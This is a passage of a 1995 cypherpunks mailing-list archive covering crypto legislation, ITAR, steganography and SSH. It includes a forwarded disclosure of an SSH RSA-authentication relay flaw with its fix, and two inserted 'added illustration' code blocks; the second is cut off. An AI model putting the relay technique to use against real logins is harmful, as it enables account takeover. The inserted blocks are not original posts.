there is no enforcement mechanism to stop it.

BTW, in re suing congressmen

"The Senators and Representatives shall [...] in all cases, except
treason, felony and breach of the peace, be privileged from arrest
during their attendance at the session of their respective Houses, and
in going to and returning from the same; and for any speech or debate
in either House, they shall not be questioned in any other place."

The last part being operative.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Thu, 13 Jul 95 23:47:07 PDT
To: "It's supposed to crash like that." <cypherpunks@toad.com
Subject: Re: Encryption and ITAR
Message-ID: <199507140645.XAA12031@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:30 PM 7/13/95 EST, It's supposed to crash like that. wrote:
>Anyone know how far ITAR reaches?  Is there a list of programs that are illegal
>to take from America anywhere else?  My company does a LOT of business (80%)
>outside the US, and I wonder if they are maybe pissing off the NSA or something
>with some software they take with them.  (a DES encrypter, and some other
>encryption stuff)

It's the other way around.  Anything that does encryption that they _haven't_
explicitly given you permission to export, or that isn't subject to subtle
and arguable interpretations of the law (or blatantly obvious interpretations
of the First Amendment) is verboten.  So buy your crypto stuff overseas,
and import it, and write letters to your Congresscritters about how annoyed
you are that you have to do this.  Might as well send them a bill for the extra
expenses you've had to incur; they won't pay it, of course, but it should 
amuse some of the Republicans....
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Silversher <silversh@rmii.com>
Date: Fri, 14 Jul 95 00:14:12 PDT
To: "Joel B. Truher" <truher@mojones.com>
Subject: Re: The MoJo Wire thanks you
In-Reply-To: <v02120d0eac2b65b1c651@[204.188.118.233]>
Message-ID: <Pine.SOL.3.91.950713235634.4000B-100000@rainbow.rmii.com>
MIME-Version: 1.0
Content-Type: text/plain


Please unlist me.

On Thu, 13 Jul 1995, Joel B. Truher wrote:

> Thank you for your help in our beta test!  Please come back soon,
> and send me mail if you'd like to be removed from this mailing
> list -- we may send a new Web product announcement every few months,
> and you'll soon receive a survey of your opinion of our site.
> 
> More info on The MoJo Wire:
> 
> 
>              "More fun than a secret decoder ring!"
>                                -- Jim Hightower
> 
>   "Mother Jones magazine is turning the tables [on Gingrich]"
>                                -- LA Times
> 
> Mother Jones is pleased to announce the official release of our
> redesigned WWW site, now called The MoJo Wire, on July 14th, at:
> 
>                     http://motherjones.com
> 
> * See Newt Gingrich's secret list of major funders on our "Coin-
>   Operated Congress" feature.  Gingrich is fighting the FEC in
>   court to keep this information secret, but you can see it here
>   for the first time.  See the ten worst, the ten richest, the
>   dirt on all of them, and help complete this interactive
>   investigation project.
> 
> * Newly revamped on-line chat software, called Live Wire,
>   provides the best Web-based political discussions anywhere.
>   Create hyperlinks in the words of others in this new feature,
>   which already contains several lively debates.
> 
> * The July/August issue of Mother Jones magazine is available
>   only on The MoJo Wire.  Read the full text of the magazine.
> 
> Many thanks to our team of two thousand beta testers!  With your
> help, we've worked a few of the last kinks out of the system,
> added a few things, and now offer the service password-free.
> 
> For more information about The MoJo Wire, send mail to
> truher@mojones.com, or call me at 415-665-6637.
> 
> Joel Truher
> Manager, The MoJo Wire
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Fri, 14 Jul 95 00:25:57 PDT
To: perry@imsi.com
Subject: Re: Crisis Overload (re Electronic Racketeering)
Message-ID: <Chameleon.4.01.2.950714022431.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:

>"Robert A. Hayden" writes:
>> We've seen the enemy, that the are the 535 senators and representatives 
>> in D.C., and the staff in the White House.  It's time to shore up our 
>> allies and enter the battle with the best weapons we have; information 
>> and popular use.
>
>As unpleasant as the congress is, it isn't the enemy. The governmental
>forces desiring control are not the same as the congress.

This is true.  IMNSHO we are witnessing yet another case of the 
representation of an illegitimate constituency.  Grassley is not representing 
the people of his state -- he is representing and carrying water for federal 
government interests.  While some people used to acidly refer to "The Senator 
from Texaco" and such, it is a much more common situation that some Senators 
and Representatives represent federal agencies in matters before their 
chamber that virtually NO VOTER would ever think of or could even discover as 
a matter of personal interest.  You can be sure Cathy Cornflower of Cherokee 
didn't start this by writing Grassley and suggesting that RICO be expanded to 
cover distribution of non-GAK crypto.  It is inconceivable that more than a 
tiny handful of Grassley's constituents would even recognize anything in his 
bill if stopped on the street and asked about it.

Agencies develop "friendly" congresscritters like the Soviets used to develop 
"friendly" journalists and politicos.  It wouldn't even be all that 
surprising if similar methods are used.  The "friendlies" take obscure and 
not-so-obscure issues before their house on behalf of the agencies.  At some 
level this is probably necessary, but with all those folks getting comfy with 
each other up there in Disneyland-on-the-Potomac, it's impossible that unholy 
alliances do not develop.  The "us vs them" mentality of a congresscritter 
grows to encompass all three branches under "us" and views the unwashed 
masses as "them."  In that view the suit from XYZ who comes over to confer 
with the staffers is "one of us."  He gets right in (while visiting 
constituents wait stupidly for an appointment that the elected official will 
be -- we're so sorry -- unable to keep).  He's bringing up an issue of 
concern to "us."  "We" have a problem that needs to be fixed by modifying 
para (a) of sec (3) to read "shall" instead of "may."  "We" will feel very 
important and may even win some special stroking or quid pro quo for fixing 
"our" problem.

The one real flaw in this is that the electorate was just left out of the 
loop, and kept in the dark to boot.  When the elected official went into "we" 
mode he ceased representing the people who sent him there.  In these 
increasingly totalitarian times it's likely his representation was 
distinctly CONTRARY to the interest of those who sent him there.

There have been cases of agencies approaching "their" congressman and having 
completely new language inserted in a conference bill -- language that was 
never in the original, never offered as an amendment until the bill from each 
house went to conference, and never debated when the conformed bills returned 
for final vote.  It's the norm that such maneuvers go completely unreported 
in the media.

>Congressmen are by and large harried and ignorant people. They have no
>idea what any of this is about. We have the choice of letting Louis
>Freeh do all the educating, or having a white shoe Washington PR firm
>do some of the educating, too. I favor the latter approach.

There is also something that is almost always overlooked... taking names.  It 
is possible to "pull on the string" and follow the visible event back to the 
less immediately visible actors.  The congresscritters, though by and large 
harried and ignorant, are not always guiltless.  At best they are willing 
agents for little bits and pieces of the fabric of overweening statism.  In 
every case, though, there are faceless staffers who may also be harried but 
are usually NOT ignorant.  The staffers are often the ones who "sell" the 
congresscritter on signing onto this or that non-voter issue for this or that 
self-serving political reason.  Staffers also include the people with huge 
political axes to grind -- people who gravitate to the positions of writing 
the text of the bills that translate the generality to which the elected 
official has acceded into excruciatingly detailed and usually 
confusing legislative language.

There's a relatively small number of really activist people in government, 
and not all of them are public and visible.  It's possible that some 
congresscritters could be defeated with the aid of dissemination back home of 
information on the non-voter issues they've championed and concise 
explanations of how many of those issues work to harm their voters.  It's 
also possible that some of those faceless staffers could be turned into 
liabilities by focusing some light on them, thereby reducing their 
effectiveness and employability.

>This is not to say that we shouldn't be widely deploying crypto -- we
>should. (Of course, offshore sites will always have crypto available,
>but...) 

It would seem that the U.S. may lose a number of good minds who may prefer to 
live and write code in other parts of the world.  This has been a developing 
trend for other reasons, and now people who like to write crypto will have 
another reason to look for a new home.

>This is also not to say that Congress doesn't pass very bad laws.

Name a good one!

>However, I very, very strongly urge that we not assume that nothing
>can be done. Just winning a couple years time could totally alter the
>landscape.

Your urging is appropriate.  It's odd, though, how the country seems to be 
pulling itself in two diametrically opposed directions:  On the one hand the 
electorate shifted significantly in the '94 election, responding with greater 
enthusiasm than even the new young Turks in Congress seem to fully 
comprehend, and seeming to be fed up with too much government, prepared to 
commission the dismantling of federal bureaucracy and getting government the 
hell out of their lives.  On the other hand we see bold and impressive moves 
on the part of politicos and bureaucrats toward a suffocating, draconian 1984 
police state.  We have even heard increasing choruses of "Just following 
orders" and "Just doing my job" from mindless hatchetmen these last few 
decades -- bizarre and incredible echoes of the excuses offered in post-WWII 
war crimes defenses.

The country cannot move strongly in these two directions for long: Something 
has to give.  The longer this division persists, the greater the gulf that 
stretches between and the more "interesting" the times that will result when 
one side prevails.  The side that prevails will consume the side that fails 
with an intensity related to the energy built up in the process.

Crypto is presently on the periphery of the larger schism, though it's 
conceivable that twenty years in the future it would be clearly understood by 
most people to be central to privacy in an information age.  The moves to 
head crypto, and thus privacy, off at the pass are being made now, though, in 
an effort to prevent a future in which large numbers of people understand how 
to maintain privacy when everything is a bit stream. 

If there is a critical and unique difference between this and other 
seemingly similar situations it is the 10-15% monthly growth of the Internet, 
something that is orders of magnitude greater than what humans are accustomed 
to perceiving, estimating, handling, coping with.  If recent figures are 
accurate, 7,500+ new web pages have been created in the 33 hours since this 
thread started here and perhaps 100,000 new people are on the net in one way 
or another.  It's unlikely that Grassley or Exon or Leahy can assimilate all 
the implications of that rate of growth.  "Senator, the blob is at the door!" 
 "Well, call the State Police!"  "Uh, sir, they're at least three hours away. 
 In that time the blob will be larger than the State of Idaho!"  

The politicos have never before dealt with a sizable "throwaway minority" 
whose current growth curve intersects the U.S. population curve in 24 months 
and the world population curve in 4 years.  In a couple of days there are 
more new people getting on the net worldwide than are contained in a U.S. 
congressional district.  Partly as a result, there are issues getting 
attention that would have easily been contained just a couple of years ago by 
the policy of benignly overlooking them.  No longer.  If a net mobilization 
was disappointing last month, try it this month and see the difference.  
Movements that took years to form and grow decades ago take days or weeks 
now.  Soon they will take only hours.  

We are just now cresting the big one on the supercharged roller coaster of 
high tech infoplosion, and as the velocity rapidly builds there will be 
profound shock among the old and the slow.  Even the savvy will be surprised. 
Push this medium for all it's worth.  Find ways to promote informed privacy 
as a ground-floor issue for newbies and get them to have a knowledgeable, 
vested interest in it.  Get people onto the net.  One new person today is 
four or five people a year from now, 15-28 people two years from now.  Since 
a lot of it spreads from person to person, new people start with tools and 
concepts they get from others, so the initiation of a new netparticipant as a 
privacy-aware crypto user tends to spawn subtrees of new users in the same 
mode.  Use the growth multiplier to outflank 'em while they're noodling.

Would it be more productive to hire the white shoes or start another few ISPs 
and shepherd the new users to be privacy-aware letter writers and faxers?  
Educate your ISPs.  Any ISP that isn't political in this age is brain 
dead and dead weight.  Any ISP that sees its political interests as somehow 
different than those of its users (recent lobbying to shift burdens away 
from national services and onto users, and recent AOL admissions of 
participation in what sounded like entrapping users) is worse than brain dead 
-- it's part of the problem.

Bolivar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Zachary H. Hanna" <zhanna@jax.jaxnet.com>
Date: Thu, 13 Jul 95 21:08:48 PDT
To: "cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199507140410.AAA12152@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: Zachary H. Hanna * EMC.Ver #2.5.02 ] --

Sure, what the hell.

------------------ PGP.ZIP Part [029/713] -------------------
MA@AT14NXXX4KXP+G,!8*\;,+L6`0&L`./;4)LO9H"`=4U&8<H`"'L1%SX0<U
M_O"D7)S`/FS"#$2A"YK#">4>M#/RD(3F,,`9?Q+[-9Q##G;BD8XQBPLXB3W8
MC%1$H@MD*/4B3^Q'.M[':!@AQ[TZ";+/L`63,`@!>$C=OL,4#,5VGP19+`9"
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Thu, 13 Jul 95 21:12:09 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Stego Standards Silly ? (Was: Re: def'n of "computer network")
In-Reply-To: <9507140229.AA13447@snark.imsi.com>
Message-ID: <9507140411.AA15519@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

.pm writes:
> Indeed -- how could the recipient even know to look, unless these
> things arrived regularly and with a fully standardized form of
> stegonography, in which case why bother, all you've done is come up
> with a very odd form of transfer encoding.

I agree, but AFAICS an odd form of transfer encoding is exactly what the
doctor ordered. For plausible cryptodeniability, one wants to send 
ciphertext using a transfer encoding that doesn't automatically ring alarm
bells. Steganography amounts to laundering Content-Type: headers.

> If the recipient does know to look, that implies either that there is
> a hint, in which case the stegonography is useless, or it implies that
> you have prearrangement, in which case my comments on prearrangement
> hold.

If the recipient isn't getting spammed with GIFs (or whatever), she (or
rather her MDA) can simply look at all of them by default. Of course this
does not help with anonymous message pools on the order of Usenet, but that
is a sub-issue.

Deranged Mutant raised an IMHO important issue a few months ago. He suggested
that Mallet could go about trashing the purportedly "random" bits in each
instantiation of some transfer encoding used in a stego standard. For
example, he shuffles the LSBs of every passing JPEG. I'm not sure how feasible
this would really be (both technically and sociopolitically), but it
could be a big annoyance if only a few people were suspected of using stego
method XYZ. 

The standard answer to agent-in-the-middle tampering is of
course digital signatures. Now, the question is, will we be allowed to sign
our possibly-stego-enclosing GIFs with reasonable confidence that the govt.
can't forge our signatures ? Obviously the signature itself can't be
stegoed, or else we fall into an infinite regress.

 -Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAXuSWf7YYibNzjpAQHlpQP/f3/e5iRl67zU3TLYZH1oNBBjC1+LYPH8
VkQMhvtRdlo2xBkY56jaZ6hZuzWanknVD1EKrG72vl5sPytXXDs5dVplFlelVw6f
VjC2UxNHe0dQHmmJqXNMMq4qlC8ZxgtNf4P9O+6iJKjz6SbA7F6LuRd+3TXv5tHm
xgGSY5bzJp8=
=ia+X
-----END PGP SIGNATURE-----
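
An added illustration of the tampering scenario discussed in the message above; it is not part of the original post. It models the carrier as raw 8-bit samples rather than a real JPEG or GIF, and uses a SHA-256 digest as a stand-in for the value a detached signature would cover (both are assumptions of this sketch).

```python
import hashlib
import random


def embed(carrier, payload):
    """Write payload bits (MSB first) into the least significant bit of each sample."""
    bits = [(byte >> shift) & 1 for byte in payload for shift in range(7, -1, -1)]
    if len(bits) > len(carrier):
        raise ValueError("payload does not fit in carrier")
    stego = bytearray(carrier)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit
    return bytes(stego)


def extract(stego, length):
    """Read `length` bytes back out of the sample LSBs."""
    out = bytearray()
    for i in range(length):
        value = 0
        for sample in stego[8 * i: 8 * i + 8]:
            value = (value << 1) | (sample & 1)
        out.append(value)
    return bytes(out)


def scrub(stego, rng):
    """Mallet's filter: replace every LSB with a fresh random bit."""
    return bytes((s & 0xFE) | rng.getrandbits(1) for s in stego)


def high_bits(samples):
    """The seven upper bits of each sample, i.e. what a viewer actually sees."""
    return bytes(s >> 1 for s in samples)


def demo(seed=1995):
    rng = random.Random(seed)
    carrier = bytes(rng.randrange(256) for _ in range(512))  # constructed samples
    payload = bytes(rng.randrange(256) for _ in range(32))   # stands in for ciphertext
    sent = embed(carrier, payload)
    signed_digest = hashlib.sha256(sent).digest()  # what a signature would cover
    received = scrub(sent, rng)
    return {
        "payload_survives_clean": extract(sent, 32) == payload,
        "payload_survives_scrub": extract(received, 32) == payload,
        "picture_unchanged": high_bits(received) == high_bits(sent),
        "digest_matches": hashlib.sha256(received).digest() == signed_digest,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The scrubbed carrier looks identical in its upper bits, so only the integrity check tells the recipient that the hidden channel was disturbed.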



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Thu, 13 Jul 95 22:10:48 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.3.89.9507132317.C24198-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 13 Jul 1995, Ray Arachelian wrote:

> On Thu, 13 Jul 1995, L. McCarthy wrote:
> 
> > Mr. GRASSLEY. Mr. President, I rise this evening to introduce the
> > Anti-electronic Racketeering Act of 1995. This bill makes important changes
> > to RICO and criminalizes deliberately using computer technology to engage in
> > criminal activity. I believe this bill is a reasonable, measured and strong
> > response to a growing problem. According to the computer emergency and
> > response team at Carnegie-Mellon University, during 1994, about 40,000
> > computer users were attacked. Virus hacker, the FBI's national computer
> > crime squad has investigated over 200 cases since 1991. So, computer crime is
> > clearly on the rise.
> 
> Eh, what do "virus hackers" have to do with encryption, why is it these 
> morons justify the destruction of encryption by mentioning hackers and 
> viruses?

The use of terms such as "virus" and "hacker" in a context such
as this has little or nothing to do with what the terms actually
mean.  It's palpably obvious that they are being bandied about
here solely for the knee-jerk emotional reactions they evoke.
Even those more computer/net clue-impaired than Grassley (assuming
that such is possible) know from watching TV and the movies that
a virus is a Bad Thing (tm) and that hackers are evil!
Pseudo-digital demagoguery.
 
> Additionally, does this mean that someone outside of the USA is in danger 
> of being grabbed by RICO armed thugs from Uncle Sam's cadre for writing 
> crypto software and publishing it in the open?  After all, once it winds 
> up on some USA site, how do we know that someone outside the USA got his 
> copy of SuperDuperNSASpookFree from a non-US site?  Just to be sure, 
> we'll bust both the site operator and nab the guy who wrote it next time 
> he drops in, or hell, we'll have him extradited.  

Or simply kidnap him and escort him back to the U.S.
 
<snip>

> > I believe we need to seriously reconsider
> > the Federal Criminal Code with an eye toward modernizing existing statutes
> > and creating new ones. In other words, Mr. President, Elliot Ness needs to
> > meet the Internet.
> 
> Where is Elliot Ness?  I don't see any mafia.org on the net.  Anyone here 
> see any such site?

It might be even more beneficial if Senator Grassley and the other
members of our august deliberative bodies would meet the internet.
My gut reaction to the recent tide of legislation is that they are
seeking to strangle what they fear and that they fear what they do
not understand.  (Too melodramatic?)
 
> > Mr. President, I sit on the Board of the Office of Technology Assessment.
> > That Office has clearly indicated that organized crime has entered cyberspace
> > in a big way. International drug cartels use computers to launder drug money
> > and terrorists like the Oklahoma City bombers use computers to conspire to
> > commit crimes.
>
> Was it not proven that McVeigh and Co. >DID NOT< use a computer?  The AOL 
> account was a hoax, no?  Where are the hordes of anti-USA terrorists, 
> and drug pushers on the net? 

You don't recognize them because they are masquerading 
as "virus hackers".

Again, the main reason for playing the "terrorist" card is
for the emotional hot-buttons they can push by so doing.
Since Grassley didn't use it, look for someone to introduce
something this session titled, "The Avenge Those Poor,
Innocent, Bloody Dead Children Act of 1995".

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 15:15:12 PDT
To: tcmay@sensemedia.net
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <ac2aab2c0b021004b5fe@[205.199.118.202]>
Message-ID: <199507132215.BAA17628@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


One motivation behind SSH is trying to make it a de-facto standard
replacement for rlogin and rsh.  That would make it very hard to
replace.  It provides important benefits in authentication and
protection against intruders - and as a side effect it provides hard
to break encryption for anyone.  Plus, it was created and is primarily
distributed *outside* the United States, in a country where none of
the algorithms are patented.  It can thus be openly available for
anyone, and is not limited by US export restrictions.  It currently
includes two algorithms that I know to be patented: RSA and IDEA.
IDEA can be eliminated from it without breaking compatibility if it
turns out necessary (and, several sources say that non-commercial use
of IDEA is permitted).  RSA is not patented anywhere but in the US,
and there it may be possible for most people to get away by using
RSAREF.

There is more information at http://www.cs.hut.fi/ssh.  The RFC
describes the protocol.

The current list of distribution sites includes:
   ftp.funet.fi:/pub/unix/security
   ftp.unit.no:/pub/unix/security 
   ftp.net.ohio-state.edu:/pub/security/ssh 
   ftp.kiae.su:/unix/crypto 
   ftp.cs.hut.fi/pub/ssh 

More sites are welcome.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 15:42:14 PDT
To: hayden@krypton.mankato.msus.edu
Subject: Re: Crisis Overload (re Electronic Racketeering)
In-Reply-To: <Pine.ULT.3.91.950713140141.8587C-100000@krypton.mankato.msus.edu>
Message-ID: <199507132241.BAA18366@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> massive use of cryptography started.  This means, and I advocated this 
> from the day I entered this forum, that programs such as PGP need to be 
> redesigned so that the a user friendly . . . so user friendly that any 
> Joe Moron can figure out not only how to use them, but also how it helps 
> them and how it is "good" for them.  This means that we need simplified 
> key management easy enough for the point-and-click masses to utilize.  
> This means that common mailing programs, From Elm and Pine to AOLs and 
> Computer$erve's mailers need to have TRANSPARENT signing of mail messages 
> and near-transparent encryption of messages.  This means that we need to 

I agree.  If you forgive me for again taking the opportunity to
advertise SSH, one goal was to make it as simple to use as possible.
To get all the benefits of encryption and most benefits of improved
authentication, the users need to know absolutely nothing in addition
to what they need to know with rlogin.  Plus, there are many
convenient features, such as automatic X11 forwarding (encrypted;
DISPLAY is set to point to a fake display), command exit status is
returned properly, etc.

Of course, rlogin and rsh are much less important applications for the
general public than e-mail.  I think that currently the most critical
problem areas are exactly e-mail and interactive messaging programs
(like irc, rwrite etc).

Most mail (at least on the internet) is currently propagated
automatically from the sending host to the receiving host.  A fairly
simple, 90% of the benefit at 10% of the effort solution could be to
have sendmail (or equivalent) encrypt all communications that go
through the network.  This would make electronic mass surveillance and
scanning difficult.  It is much more expensive (and dangerous
publicity-wise) to read messages by breaking into a computer system.
This kind of system could be installed without the user even being
aware that something like that is in use.  It is not a perfect
solution - some sites will not support encryption, and some messages
might get sent without it.  Still, the bulk of the messages would be
encrypted, and any really sensitive data could be additionally PGP (or
similar) encrypted.  The protocol and implementation would have to be
well made and established as internet standards.

    Tatu Ylonen <ylo@cs.hut.fi>

For more information about SSH, see http://www.cs.hut.fi/ssh.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 14 Jul 95 01:44:50 PDT
To: cypherpunks@toad.com
Subject: c2.org now offers telnet-only accounts
Message-ID: <199507140842.BAA06740@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	"The Premier Cypherpunk ISP" now offers shell accounts at a
discount to those who will just telnet in and not use the dialup
pool. We are one of the only ISPs in the country who offers anonymous
shell accounts. (Payment in advance, of course.)
	Check out http://www.c2.org

	If you think our net is too slow right now, check back in
about a month.

	("Premier Cypherpunk ISP" is a bit of a joke, btw)
-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 13 Jul 95 22:47:32 PDT
To: perry@imsi.com
Subject: Re: Fight, or Roll Over?
In-Reply-To: <9507140301.AA13498@snark.imsi.com>
Message-ID: <199507140547.BAA26040@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:

| watched and learned of indicates to me that there are enough people
| and companies with an interest here to raise a few million
| dollars. Consider that Netscape alone is a very wealthy company that
| would have its marketing plans strongly disrupted by this new piece of
| congressional trash.

	Sun is also a probable ally.  John Gage (Sun's chief technical
officer?) regularly slams the ITARs, as does CEO Scott McNealy.

	It would seem that those who don't write code should be out
advocating the positive uses of cryptography, and looking for groups
who can effectively fight this the way people normally fight bad
legislation in Congress.  Petitions don't work.  Spending piles of
cash does.  Writing code works even better.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@shadow.net (Joe Block)
Date: Thu, 13 Jul 95 22:47:28 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <v01520c00ac2b66391bae@[198.79.48.49]>
MIME-Version: 1.0
Content-Type: text/plain


re:
>On June 27, Sen. Grassley introduced extensive criminal amendments to the
>federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
>1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
>18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
>(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This is a shining example of the Conservation of Tyranny.  The former
Soviet Union is becoming more free (with admittedly a few bumps in the
road), so the US is becoming less so (with a few bumps such as the
temporary defeat of Clipper).

Sadly, this is only partially tongue in cheek.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 13 Jul 95 23:03:18 PDT
To: cypherpunks@toad.com
Subject: Grassley:  Lick my Gorton, Exon me all night long...
Message-ID: <Pine.ULT.3.91.950714015400.5379C-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



I don't know if anyone has taken this into consideration:  several people
have noted that the anti-racket-whatever bill doesn't have too much chance
of getting out of committee because its wording is a bit, well, broad. 
It's being reviewed by the Senate Judiciary committee.  This is a problem 
for us, because Sen. Grassley is the chair of that committee.

His e-mail address is chuck_grassley@grassley.senate.gov, fire away!

Proud to be an Amurican,
-=Kathleen M. Ellis=-

"Buy your data, encrypt a rifle, and wait to be revolting..."
                                       -=The Book of Phil 7:1=-
kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 16:03:36 PDT
To: mazieres@pa.dec.com
Subject: Re: Ssh security hole?
In-Reply-To: <9507132008.AA27925@ima.pa.dec.com.pa.dec.com>
Message-ID: <199507132303.CAA18383@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


(I'll forward your message to a couple of lists where it might be
of interest; the original message is at end.)

I think you are right in your analysis.  There is indeed a problem
with RSA authentication.  Basically what this means is that if you log
into a corrupt host, that host can at the same time log into another
host with your account (by fooling you to answer to the request)
provided that you use the same RSA identity for both hosts.

A workaround is to use a different identity for each host you use.
The default identity can be specified on a per-host basis in the
configuration file, or by -i options.

And, yes, I think the same problem might occur with client host
authentication.  Though, there you would still have to do IP-spoofing,
DNS spoofing or similar to get through (breaking RSA based host client
effectively reduces RhostsRSAAuthentication to conventional .rhosts
authentication).

The protocol will need to be changed somewhat because of this.  I'll
think about it tomorrow and let you say your opinion about it.

Thanks!

    Tatu Ylonen <ylo@cs.hut.fi>

Date: Thu, 13 Jul 1995 13:08:15 -0700
From: David Mazieres <mazieres@pa.dec.com>
To: ssh-bugs@cs.hut.fi
Cc: rtm@eecs.harvard.edu, dm@eecs.harvard.edu, tbl@eecs.harvard.edu
Subject: Ssh security hole?

I believe there is a serious problem with the RSA authentication
scheme used in ssh, but then again I could be misreading the proposed
RFC.  Is the following really the case?

As I understand the protocol, here is what happens during SSH_AUTH_RSA
authentication.

Suppose the holder of SKu, is allowed access to account U on machine B
(which holds SKb).  Both PKu and PKb are widely known.  In addition,
machine B has a session key, PKs, which changes every hour.  When U on
machine A wants to log into machine B, here's what I think happens
based on my reading of the RFC:

A -> B: A

B -> A: (PKb, PKs, COOKIE)
	[A flags an error if PKb is not the stored value.]

A -> B: (COOKIE, {{Kab}_PKs}_PKb)
A -> B: {U}_Kab
A -> B: {PKu}_Kab
	[B aborts if SKu is not allowed access to account U.]

B -> A: {{N}_PKu}_Kab

A -> B: {{N}_MD5}_Kab (*)
	[B aborts if the MD5 hash is invalid.]

B -> A: access to account U with all data encrypted by Kab.

The problem is, suppose U actually wanted to log into machine C, which
was maintained by an untrusted person.  The person maintaining C could
initiate a connection to B the minute U tried to log into C.  When
given a challenge {{N}_PKu}_Kbc, C could simply give this to A as the
challenge to respond to, and then forward the response to B.

To fix the problem, A must at the very least include B in the
response line marked (*).  I have reason to believe (after having just
seen a lecture on authentication), that you might even need to include
more.  A safe bet might be (but then again I am no expert):

A -> B: {(N, A, B, Kab)}_MD5

I think similar problems arise for the other authentication methods.

Other than that, though, I am really impressed by ssh.  It's easy
to install and easy to use.  In fact, it is even more convenient to
use than standard rsh, because the X forwarding happens
automatically.

Thanks for such a great package!

David
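
An added toy model of the exchange analysed in the forwarded message above; it is not code from ssh or from either author. It compares the response marked (*) with the bound response {(N, A, B, Kab)}_MD5 that the message suggests. The tiny RSA key, the class and function names, and the omission of the outer {..}_Kab encryption layer are assumptions of this sketch.

```python
"""Toy model: forwarding the SSH_AUTH_RSA challenge through an untrusted host."""
import hashlib
import secrets

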